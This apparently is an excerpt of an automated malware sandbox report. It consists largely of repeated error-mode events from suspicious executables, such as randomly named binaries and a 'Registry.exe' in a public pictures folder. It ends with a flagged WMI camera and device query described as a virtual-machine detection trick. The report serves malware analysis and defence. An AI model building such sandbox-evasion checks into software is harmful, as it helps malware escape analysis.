                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
